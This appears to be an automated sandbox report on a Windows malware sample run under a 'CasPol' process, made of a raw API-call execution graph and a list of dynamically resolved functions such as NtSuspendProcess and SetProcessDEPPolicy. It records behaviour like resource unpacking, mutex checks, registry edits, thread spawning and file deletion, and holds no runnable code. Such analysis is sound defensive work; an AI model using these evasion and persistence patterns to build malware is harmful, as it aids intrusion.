                                                                                                              execution_graph 47166 4047eb WaitForSingleObject 47167 404805 SetEvent CloseHandle 47166->47167 47168 40481c closesocket 47166->47168 47169 40489c 47167->47169 47170 404829 47168->47170 47171 40483f 47170->47171 47179 404ab1 83 API calls 47170->47179 47173 404851 WaitForSingleObject 47171->47173 47174 404892 SetEvent CloseHandle 47171->47174 47180 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47173->47180 47174->47169 47176 404860 SetEvent WaitForSingleObject 47181 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47176->47181 47178 404878 SetEvent CloseHandle CloseHandle 47178->47174 47179->47171 47180->47176 47181->47178 47182 446fc8 47190 4473ba 47182->47190 47187 446ff1 47189 446fdc 47217 447174 47190->47217 47193 4473f9 TlsAlloc 47194 4473ea 47193->47194 47224 433d2c 47194->47224 47196 446fd2 47196->47189 47197 446f43 GetLastError 47196->47197 47198 446f5c 47197->47198 47199 446f62 47197->47199 47246 447466 11 API calls 2 library calls 47198->47246 47203 446fb9 SetLastError 47199->47203 47239 448706 47199->47239 47206 446fc2 47203->47206 47204 446f7c 47247 446ac5 20 API calls _free 47204->47247 47206->47187 47216 446ff4 11 API calls 47206->47216 47208 446f91 47208->47204 47210 446f98 47208->47210 47209 446f82 47211 446fb0 SetLastError 47209->47211 47249 446d31 20 API calls _free 47210->47249 47211->47206 47213 446fa3 47250 446ac5 20 API calls _free 47213->47250 47215 446fa9 47215->47203 47215->47211 47216->47189 47218 4471a4 47217->47218 47222 4471a0 47217->47222 47218->47193 47218->47194 47219 4471c4 47219->47218 47221 4471d0 GetProcAddress 47219->47221 47223 4471e0 __crt_fast_encode_pointer 47221->47223 47222->47218 47222->47219 47231 447210 47222->47231 47223->47218 47225 433d37 IsProcessorFeaturePresent 47224->47225 47226 433d35 47224->47226 47228 4341a4 47225->47228 47226->47196 47238 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47228->47238 47230 434287 47230->47196 47232 447226 47231->47232 47233 447231 LoadLibraryExW 47231->47233 47232->47222 47234 44724e GetLastError 47233->47234 47235 447266 47233->47235 47234->47235 47236 447259 LoadLibraryExW 47234->47236 47235->47232 47237 44727d FreeLibrary 47235->47237 47236->47235 47237->47232 47238->47230 47244 448713 _strftime 47239->47244 47240 448753 47252 445354 20 API calls _free 47240->47252 47241 44873e RtlAllocateHeap 47242 446f74 47241->47242 47241->47244 47242->47204 47248 4474bc 11 API calls 2 library calls 47242->47248 47244->47240 47244->47241 47251 442200 7 API calls 2 library calls 47244->47251 47246->47199 47247->47209 47248->47208 47249->47213 47250->47215 47251->47244 47252->47242 47253 4339be 47254 4339ca ___DestructExceptionObject 47253->47254 47285 4336b3 47254->47285 47256 4339d1 47257 433b24 47256->47257 47260 4339fb 47256->47260 47587 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47257->47587 47259 433b2b 47580 4426be 47259->47580 47268 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47260->47268 47296 4434d1 47260->47296 47267 433a1a 47270 433a9b 47268->47270 47583 43edf4 35 API calls 4 library calls 47268->47583 47304 433c5e 47270->47304 47279 433abd 47279->47259 47280 433ac1 47279->47280 47281 433aca 47280->47281 47585 442661 28 API calls _Atexit 47280->47585 47586 433842 13 API calls 2 library calls 47281->47586 47284 433ad2 47284->47267 47286 4336bc 47285->47286 47589 433e0a IsProcessorFeaturePresent 47286->47589 47288 4336c8 47590 4379ee 47288->47590 47290 4336cd 47295 4336d1 47290->47295 47599 44335e 47290->47599 47293 4336e8 47293->47256 47295->47256 47297 4434e8 47296->47297 47298 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47297->47298 47299 433a14 47298->47299 47299->47267 47300 443475 47299->47300 47301 4434a4 47300->47301 47302 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47301->47302 47303 4434cd 47302->47303 47303->47268 47649 436050 47304->47649 47306 433c71 GetStartupInfoW 47307 433aa1 47306->47307 47308 443422 47307->47308 47650 44ddc9 47308->47650 47310 44342b 47311 433aaa 47310->47311 47654 44e0d3 35 API calls 47310->47654 47313 40d767 47311->47313 47811 41bce3 LoadLibraryA GetProcAddress 47313->47811 47315 40d783 GetModuleFileNameW 47816 40e168 47315->47816 47317 40d79f 47831 401fbd 28 API calls 47317->47831 47319 40d7ae 47832 401fbd 28 API calls 47319->47832 47321 40d7bd 47833 41afc3 28 API calls 47321->47833 47323 40d7c6 47834 40e8bd 11 API calls 47323->47834 47325 40d7cf 47835 401d8c 11 API calls 47325->47835 47327 40d7d8 47328 40d835 47327->47328 47329 40d7eb 47327->47329 47836 401d64 22 API calls 47328->47836 47856 40e986 111 API calls 47329->47856 47332 40d7fd 47857 401d64 22 API calls 47332->47857 47333 40d845 47837 401d64 22 API calls 47333->47837 47336 40d864 47838 404cbf 28 API calls 47336->47838 47338 40d809 47858 40e937 65 API calls 47338->47858 47339 40d873 47839 405ce6 28 API calls 47339->47839 47342 40d87f 47840 401eef 47342->47840 47343 40d824 47859 40e155 65 API calls 47343->47859 47346 40d88b 47844 401eea 47346->47844 47347 40d82d 47350 401eea 11 API calls 47347->47350 47349 40d894 47351 401eea 11 API calls 47349->47351 47352 40dc9f 47350->47352 47353 40d89d 47351->47353 47584 433c94 GetModuleHandleW 47352->47584 47848 401d64 22 API calls 47353->47848 47355 40d8a6 47849 401ebd 28 API calls 47355->47849 47357 40d8b1 47850 401d64 22 API calls 47357->47850 47359 40d8ca 47851 401d64 22 API calls 47359->47851 47361 40d8e5 47374 40d946 47361->47374 47860 4085b4 28 API calls 47361->47860 47364 40d912 47365 401eef 11 API calls 47364->47365 47366 40d91e 47365->47366 47367 401eea 11 API calls 47366->47367 47371 40d927 47367->47371 47369 40d9aa 47369->47347 47864 41a463 33 API calls 47369->47864 47370 40d95d 47381 40d9a4 47370->47381 47862 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 47370->47862 47861 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 47371->47861 47376 40e134 47374->47376 47852 401d64 22 API calls 47374->47852 47950 412902 30 API calls 47376->47950 47377 40d9c5 47380 40da18 47377->47380 47865 40697b RegOpenKeyExA RegQueryValueExA RegCloseKey 47377->47865 47378 40d988 47378->47381 47863 412902 30 API calls 47378->47863 47870 401d64 22 API calls 47380->47870 47853 40bed7 47381->47853 47385 40da21 47394 40da32 47385->47394 47395 40da2d 47385->47395 47386 40d9e0 47388 40d9e4 47386->47388 47389 40d9ee 47386->47389 47387 40e14a 47951 4112b5 64 API calls ___scrt_fastfail 47387->47951 47866 40699d 30 API calls 47388->47866 47868 401d64 22 API calls 47389->47868 47872 401d64 22 API calls 47394->47872 47871 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47395->47871 47396 40d9e9 47867 4064d0 97 API calls 47396->47867 47400 40da3b 47873 41ae08 28 API calls 47400->47873 47402 40d9f7 47402->47380 47404 40da13 47402->47404 47403 40da46 47874 401e18 11 API calls 47403->47874 47869 4064d0 97 API calls 47404->47869 47407 40da51 47875 401e13 11 API calls 47407->47875 47409 40da5a 47876 401d64 22 API calls 47409->47876 47411 40da63 47877 401d64 22 API calls 47411->47877 47413 40da7d 47878 401d64 22 API calls 47413->47878 47415 40da97 47879 401d64 22 API calls 47415->47879 47417 40db22 47420 40db2c 47417->47420 47425 40dcaa ___scrt_fastfail 47417->47425 47418 40dab0 47418->47417 47880 401d64 22 API calls 47418->47880 47421 40db35 47420->47421 47428 40dbb1 47420->47428 47886 401d64 22 API calls 47421->47886 47423 40db3e 47887 401d64 22 API calls 47423->47887 47424 40dac5 _wcslen 47424->47417 47881 401d64 22 API calls 47424->47881 47897 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47425->47897 47427 40db50 47888 401d64 22 API calls 47427->47888 47451 40dbac ___scrt_fastfail 47428->47451 47430 40dae0 47882 401d64 22 API calls 47430->47882 47433 40db62 47889 401d64 22 API calls 47433->47889 47435 40daf5 47883 40c89e 31 API calls 47435->47883 47436 40dcef 47898 401d64 22 API calls 47436->47898 47440 40db8b 47890 401d64 22 API calls 47440->47890 47441 40dd16 47899 401f66 28 API calls 47441->47899 47442 40db08 47884 401e18 11 API calls 47442->47884 47444 40db14 47885 401e13 11 API calls 47444->47885 47447 40dd25 47900 4126d2 14 API calls 47447->47900 47449 40db9c 47891 40bc67 45 API calls _wcslen 47449->47891 47450 40db1d 47450->47417 47451->47428 47892 4128a2 31 API calls 47451->47892 47455 40dd3b 47901 401d64 22 API calls 47455->47901 47456 40dc45 ctype 47893 401d64 22 API calls 47456->47893 47458 40dd47 47902 43a5e7 39 API calls _strftime 47458->47902 47461 40dd54 47463 40dd81 47461->47463 47903 41beb0 86 API calls ___scrt_fastfail 47461->47903 47462 40dc5c 47462->47436 47894 401d64 22 API calls 47462->47894 47904 401f66 28 API calls 47463->47904 47465 40dc7e 47895 41ae08 28 API calls 47465->47895 47469 40dd65 CreateThread 47469->47463 47985 41c96f 10 API calls 47469->47985 47470 40dd96 47905 401f66 28 API calls 47470->47905 47471 40dc87 47896 40e219 109 API calls 47471->47896 47474 40dda5 47906 41a686 79 API calls 47474->47906 47475 40dc8c 47475->47436 47477 40dc93 47475->47477 47477->47347 47478 40ddaa 47907 401d64 22 API calls 47478->47907 47480 40ddb6 47908 401d64 22 API calls 47480->47908 47482 40ddcb 47909 401d64 22 API calls 47482->47909 47484 40ddeb 47910 43a5e7 39 API calls _strftime 47484->47910 47486 40ddf8 47911 401d64 22 API calls 47486->47911 47488 40de03 47912 401d64 22 API calls 47488->47912 47490 40de14 47913 401d64 22 API calls 47490->47913 47492 40de29 47914 401d64 22 API calls 47492->47914 47494 40de3a 47495 40de41 StrToIntA 47494->47495 47915 409517 142 API calls _wcslen 47495->47915 47497 40de53 47916 401d64 22 API calls 47497->47916 47499 40dea1 47919 401d64 22 API calls 47499->47919 47500 40de5c 47500->47499 47917 43360d 22 API calls 3 library calls 47500->47917 47503 40de71 47918 401d64 22 API calls 47503->47918 47505 40de84 47506 40de8b CreateThread 47505->47506 47506->47499 47979 419128 102 API calls 2 library calls 47506->47979 47507 40def9 47922 401d64 22 API calls 47507->47922 47508 40deb1 47508->47507 47920 43360d 22 API calls 3 library calls 47508->47920 47511 40dec6 47921 401d64 22 API calls 47511->47921 47513 40ded8 47516 40dedf CreateThread 47513->47516 47514 40df6c 47928 401d64 22 API calls 47514->47928 47515 40df02 47515->47514 47923 401d64 22 API calls 47515->47923 47516->47507 47984 419128 102 API calls 2 library calls 47516->47984 47519 40df1e 47924 401d64 22 API calls 47519->47924 47520 40df75 47521 40dfba 47520->47521 47929 401d64 22 API calls 47520->47929 47933 41a7a2 29 API calls 47521->47933 47525 40df33 47925 40c854 31 API calls 47525->47925 47526 40dfc3 47934 401e18 11 API calls 47526->47934 47527 40df8a 47930 401d64 22 API calls 47527->47930 47529 40dfce 47935 401e13 11 API calls 47529->47935 47531 40df46 47926 401e18 11 API calls 47531->47926 47534 40df9f 47931 43a5e7 39 API calls _strftime 47534->47931 47536 40dfd7 CreateThread 47539 40e004 47536->47539 47540 40dff8 CreateThread 47536->47540 47980 40e54f 82 API calls 47536->47980 47537 40df52 47927 401e13 11 API calls 47537->47927 47542 40e019 47539->47542 47543 40e00d CreateThread 47539->47543 47540->47539 47981 410f36 138 API calls 47540->47981 47547 40e073 47542->47547 47936 401f66 28 API calls 47542->47936 47543->47542 47982 411524 38 API calls ___scrt_fastfail 47543->47982 47545 40df5b CreateThread 47545->47514 47983 40196b 49 API calls _strftime 47545->47983 47546 40dfac 47932 40b95c 7 API calls 47546->47932 47940 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 47547->47940 47550 40e046 47937 404c9e 28 API calls 47550->47937 47553 40e08b 47555 40e12a 47553->47555 47941 41ae08 28 API calls 47553->47941 47554 40e053 47938 401f66 28 API calls 47554->47938 47948 40cbac 27 API calls 47555->47948 47559 40e062 47939 41a686 79 API calls 47559->47939 47560 40e12f 47949 413fd4 168 API calls _strftime 47560->47949 47561 40e0a4 47942 412584 31 API calls 47561->47942 47564 40e067 47565 401eea 11 API calls 47564->47565 47565->47547 47567 40e0ba 47943 401e13 11 API calls 47567->47943 47569 40e0ed DeleteFileW 47570 40e0f4 47569->47570 47571 40e0c5 47569->47571 47944 41ae08 28 API calls 47570->47944 47571->47569 47571->47570 47572 40e0db Sleep 47571->47572 47572->47571 47574 40e104 47945 41297a RegOpenKeyExW RegDeleteValueW 47574->47945 47576 40e117 47946 401e13 11 API calls 47576->47946 47578 40e121 47947 401e13 11 API calls 47578->47947 47987 44243b 47580->47987 47583->47270 47584->47279 47585->47281 47586->47284 47587->47259 47589->47288 47591 4379f3 ___vcrt_initialize_winapi_thunks 47590->47591 47603 438cb9 47591->47603 47595 437a09 47596 437a14 47595->47596 47617 438cf5 DeleteCriticalSection 47595->47617 47596->47290 47598 437a01 47598->47290 47645 44e949 47599->47645 47602 437a17 8 API calls 3 library calls 47602->47295 47605 438cc2 47603->47605 47606 438ceb 47605->47606 47607 4379fd 47605->47607 47618 438f46 47605->47618 47623 438cf5 DeleteCriticalSection 47606->47623 47607->47598 47609 437ecf 47607->47609 47638 438e57 47609->47638 47613 437ef2 47614 437eff 47613->47614 47644 437f02 6 API calls ___vcrt_FlsFree 47613->47644 47614->47595 47616 437ee4 47616->47595 47617->47598 47624 438de8 47618->47624 47620 438f60 47621 438f7e InitializeCriticalSectionAndSpinCount 47620->47621 47622 438f69 47620->47622 47621->47622 47622->47605 47623->47607 47625 438e10 47624->47625 47626 438e0c __crt_fast_encode_pointer 47624->47626 47625->47626 47631 438d24 47625->47631 47626->47620 47629 438e2a GetProcAddress 47629->47626 47630 438e3a __crt_fast_encode_pointer 47629->47630 47630->47626 47636 438d33 try_get_first_available_module 47631->47636 47632 438ddd 47632->47626 47632->47629 47633 438d50 LoadLibraryExW 47634 438d6b GetLastError 47633->47634 47633->47636 47634->47636 47635 438dc6 FreeLibrary 47635->47636 47636->47632 47636->47633 47636->47635 47637 438d9e LoadLibraryExW 47636->47637 47637->47636 47639 438de8 try_get_function 5 API calls 47638->47639 47640 438e71 47639->47640 47641 438e8a TlsAlloc 47640->47641 47642 437ed9 47640->47642 47642->47616 47643 438f08 6 API calls try_get_function 47642->47643 47643->47613 47644->47616 47648 44e962 47645->47648 47646 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47647 4336da 47646->47647 47647->47293 47647->47602 47648->47646 47649->47306 47651 44dddb 47650->47651 47652 44ddd2 47650->47652 47651->47310 47655 44dcc8 47652->47655 47654->47310 47675 446ebf GetLastError 47655->47675 47657 44dcd5 47695 44dde7 47657->47695 47659 44dcdd 47704 44da5c 47659->47704 47661 44dcf4 47661->47651 47665 44dd37 47729 446ac5 20 API calls _free 47665->47729 47669 44dd32 47728 445354 20 API calls _free 47669->47728 47671 44dd7b 47671->47665 47731 44d932 20 API calls 47671->47731 47672 44dd4f 47672->47671 47730 446ac5 20 API calls _free 47672->47730 47676 446ed5 47675->47676 47677 446edb 47675->47677 47732 447466 11 API calls 2 library calls 47676->47732 47679 448706 _free 20 API calls 47677->47679 47681 446f2a SetLastError 47677->47681 47680 446eed 47679->47680 47682 446ef5 47680->47682 47734 4474bc 11 API calls 2 library calls 47680->47734 47681->47657 47733 446ac5 20 API calls _free 47682->47733 47684 446f0a 47684->47682 47686 446f11 47684->47686 47735 446d31 20 API calls _free 47686->47735 47687 446efb 47689 446f36 SetLastError 47687->47689 47737 4453b6 35 API calls _Atexit 47689->47737 47690 446f1c 47736 446ac5 20 API calls _free 47690->47736 47694 446f23 47694->47681 47694->47689 47696 44ddf3 ___DestructExceptionObject 47695->47696 47697 446ebf __Getctype 35 API calls 47696->47697 47699 44ddfd 47697->47699 47702 44de81 __fread_nolock 47699->47702 47738 4453b6 35 API calls _Atexit 47699->47738 47739 444acc EnterCriticalSection 47699->47739 47740 446ac5 20 API calls _free 47699->47740 47741 44de78 LeaveCriticalSection std::_Lockit::~_Lockit 47699->47741 47702->47659 47742 4392de 47704->47742 47707 44da7d GetOEMCP 47709 44daa6 47707->47709 47708 44da8f 47708->47709 47710 44da94 GetACP 47708->47710 47709->47661 47711 446aff 47709->47711 47710->47709 47712 446b3d 47711->47712 47716 446b0d _strftime 47711->47716 47753 445354 20 API calls _free 47712->47753 47714 446b28 RtlAllocateHeap 47715 446b3b 47714->47715 47714->47716 47715->47665 47718 44de89 47715->47718 47716->47712 47716->47714 47752 442200 7 API calls 2 library calls 47716->47752 47719 44da5c 37 API calls 47718->47719 47720 44dea8 47719->47720 47721 44df1e ___scrt_fastfail 47720->47721 47722 44deaf 47720->47722 47725 44def9 IsValidCodePage 47720->47725 47754 44db34 GetCPInfo 47721->47754 47723 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47722->47723 47724 44dd2a 47723->47724 47724->47669 47724->47672 47725->47722 47726 44df0b GetCPInfo 47725->47726 47726->47721 47726->47722 47728->47665 47729->47661 47730->47671 47731->47665 47732->47677 47733->47687 47734->47684 47735->47690 47736->47694 47739->47699 47740->47699 47741->47699 47743 4392f1 47742->47743 47744 4392fb 47742->47744 47743->47707 47743->47708 47744->47743 47745 446ebf __Getctype 35 API calls 47744->47745 47746 43931c 47745->47746 47750 44700e 35 API calls __Getctype 47746->47750 47748 439335 47751 44703b 35 API calls _strftime 47748->47751 47750->47748 47751->47743 47752->47716 47753->47715 47755 44dc18 47754->47755 47761 44db6e 47754->47761 47758 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47755->47758 47760 44dcc4 47758->47760 47760->47722 47764 44fed3 47761->47764 47763 449b6d _swprintf 40 API calls 47763->47755 47765 4392de _strftime 35 API calls 47764->47765 47766 44fef3 MultiByteToWideChar 47765->47766 47768 44ff31 47766->47768 47772 44ffc3 __freea 47766->47772 47770 446aff _strftime 21 API calls 47768->47770 47773 44ff52 __alloca_probe_16 ___scrt_fastfail 47768->47773 47769 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47771 44dbcf 47769->47771 47770->47773 47776 449b6d 47771->47776 47772->47769 47773->47772 47774 44ff97 MultiByteToWideChar 47773->47774 47774->47772 47775 44ffb3 GetStringTypeW 47774->47775 47775->47772 47777 4392de _strftime 35 API calls 47776->47777 47778 449b80 47777->47778 47781 449950 47778->47781 47782 44996b ___crtLCMapStringA 47781->47782 47783 449991 MultiByteToWideChar 47782->47783 47784 449a91 __freea 47783->47784 47785 4499bb 47783->47785 47786 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47784->47786 47789 446aff _strftime 21 API calls 47785->47789 47790 4499dc __alloca_probe_16 47785->47790 47787 449b58 47786->47787 47787->47763 47788 449a25 MultiByteToWideChar 47788->47784 47791 449a3e 47788->47791 47789->47790 47790->47784 47790->47788 47802 44785d 47791->47802 47794 449aa0 47796 446aff _strftime 21 API calls 47794->47796 47798 449ac1 __alloca_probe_16 47794->47798 47795 449a68 47795->47784 47797 44785d _strftime 11 API calls 47795->47797 47796->47798 47797->47784 47798->47784 47799 44785d _strftime 11 API calls 47798->47799 47800 449b15 47799->47800 47800->47784 47801 449b24 WideCharToMultiByte 47800->47801 47801->47784 47803 447174 _free 5 API calls 47802->47803 47804 447884 47803->47804 47807 44788d 47804->47807 47810 4478e5 10 API calls 3 library calls 47804->47810 47806 4478cd LCMapStringW 47806->47807 47808 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47807->47808 47809 4478df 47808->47809 47809->47784 47809->47794 47809->47795 47810->47806 47812 41bd22 LoadLibraryA GetProcAddress 47811->47812 47813 41bd12 GetModuleHandleA GetProcAddress 47811->47813 47814 41bd4b 32 API calls 47812->47814 47815 41bd3b LoadLibraryA GetProcAddress 47812->47815 47813->47812 47814->47315 47815->47814 47952 41a63f FindResourceA 47816->47952 47820 40e192 ctype 47962 401f86 47820->47962 47823 401eef 11 API calls 47824 40e1b8 47823->47824 47825 401eea 11 API calls 47824->47825 47826 40e1c1 47825->47826 47827 43a88c ___std_exception_copy 21 API calls 47826->47827 47828 40e1d2 ctype 47827->47828 47966 406052 28 API calls 47828->47966 47830 40e205 47830->47317 47831->47319 47832->47321 47833->47323 47834->47325 47835->47327 47836->47333 47837->47336 47838->47339 47839->47342 47841 401efe 47840->47841 47843 401f0a 47841->47843 47974 4021b9 11 API calls 47841->47974 47843->47346 47846 4021b9 47844->47846 47845 4021e8 47845->47349 47846->47845 47975 40262e 11 API calls _Deallocate 47846->47975 47848->47355 47849->47357 47850->47359 47851->47361 47852->47370 47976 401e8f 47853->47976 47855 40bee1 CreateMutexA GetLastError 47855->47369 47856->47332 47857->47338 47858->47343 47860->47364 47861->47374 47862->47378 47863->47381 47864->47377 47865->47386 47866->47396 47867->47389 47868->47402 47869->47380 47870->47385 47871->47394 47872->47400 47873->47403 47874->47407 47875->47409 47876->47411 47877->47413 47878->47415 47879->47418 47880->47424 47881->47430 47882->47435 47883->47442 47884->47444 47885->47450 47886->47423 47887->47427 47888->47433 47889->47440 47890->47449 47891->47451 47892->47456 47893->47462 47894->47465 47895->47471 47896->47475 47897->47436 47898->47441 47899->47447 47900->47455 47901->47458 47902->47461 47903->47469 47904->47470 47905->47474 47906->47478 47907->47480 47908->47482 47909->47484 47910->47486 47911->47488 47912->47490 47913->47492 47914->47494 47915->47497 47916->47500 47917->47503 47918->47505 47919->47508 47920->47511 47921->47513 47922->47515 47923->47519 47924->47525 47925->47531 47926->47537 47927->47545 47928->47520 47929->47527 47930->47534 47931->47546 47932->47521 47933->47526 47934->47529 47935->47536 47936->47550 47937->47554 47938->47559 47939->47564 47940->47553 47941->47561 47942->47567 47943->47571 47944->47574 47945->47576 47946->47578 47947->47555 47948->47560 47978 419e89 104 API calls 47949->47978 47950->47387 47953 40e183 47952->47953 47954 41a65c LoadResource LockResource SizeofResource 47952->47954 47955 43a88c 47953->47955 47954->47953 47961 446aff _strftime 47955->47961 47956 446b3d 47968 445354 20 API calls _free 47956->47968 47958 446b28 RtlAllocateHeap 47959 446b3b 47958->47959 47958->47961 47959->47820 47961->47956 47961->47958 47967 442200 7 API calls 2 library calls 47961->47967 47963 401f8e 47962->47963 47969 402325 47963->47969 47965 401fa4 47965->47823 47966->47830 47967->47961 47968->47959 47970 40232f 47969->47970 47972 40233a 47970->47972 47973 40294a 28 API calls 47970->47973 47972->47965 47973->47972 47974->47843 47975->47845 47977 401e94 47976->47977 47986 411637 62 API calls 47981->47986 47988 442447 pair 47987->47988 47989 442460 47988->47989 47990 44244e 47988->47990 48011 444acc EnterCriticalSection 47989->48011 48023 442595 GetModuleHandleW 47990->48023 47993 442453 47993->47989 48024 4425d9 GetModuleHandleExW 47993->48024 47994 442505 48012 442545 47994->48012 47998 4424dc 48002 4424f4 47998->48002 48007 443475 _Atexit 5 API calls 47998->48007 48000 442522 48015 442554 48000->48015 48001 44254e 48033 456499 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 48001->48033 48008 443475 _Atexit 5 API calls 48002->48008 48003 442467 48003->47994 48003->47998 48032 4431ef 20 API calls _Atexit 48003->48032 48007->48002 48008->47994 48011->48003 48034 444b14 LeaveCriticalSection 48012->48034 48014 44251e 48014->48000 48014->48001 48035 447973 48015->48035 48018 442582 48021 4425d9 _Atexit 8 API calls 48018->48021 48019 442562 GetPEB 48019->48018 48020 442572 GetCurrentProcess TerminateProcess 48019->48020 48020->48018 48022 44258a ExitProcess 48021->48022 48023->47993 48025 442626 48024->48025 48026 442603 GetProcAddress 48024->48026 48028 442635 48025->48028 48029 44262c FreeLibrary 48025->48029 48027 442618 48026->48027 48027->48025 48030 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48028->48030 48029->48028 48031 44245f 48030->48031 48031->47989 48032->47998 48034->48014 48036 447998 48035->48036 48040 44798e 48035->48040 48037 447174 _free 5 API calls 48036->48037 48037->48040 48038 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48039 44255e 48038->48039 48039->48018 48039->48019 48040->48038 48041 4339ac 48046 433cd7 SetUnhandledExceptionFilter 48041->48046 48043 4339b1 pre_c_initialization 48047 4447cb 20 API calls 2 library calls 48043->48047 48045 4339bc 48046->48043 48047->48045

                                                                                                              Executed Functions

                                                                                                              Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(Psapi), ref: 0041BCF8
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD01
                                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD1B
                                                                                                              • LoadLibraryA.KERNEL32(shcore), ref: 0041BD2D
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD30
                                                                                                              • LoadLibraryA.KERNEL32(user32), ref: 0041BD41
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD44
                                                                                                              • LoadLibraryA.KERNEL32(ntdll), ref: 0041BD55
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD58
                                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 0041BD65
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD68
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD78
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD88
                                                                                                              • LoadLibraryA.KERNEL32(Shell32), ref: 0041BD99
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD9C
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDAC
                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDC0
                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDD4
                                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDE8
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDF8
                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041BE06
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE09
                                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 0041BE16
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE19
                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE2E
                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE3E
                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041BE50
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE53
                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041BE60
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE63
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleLibraryLoadModule
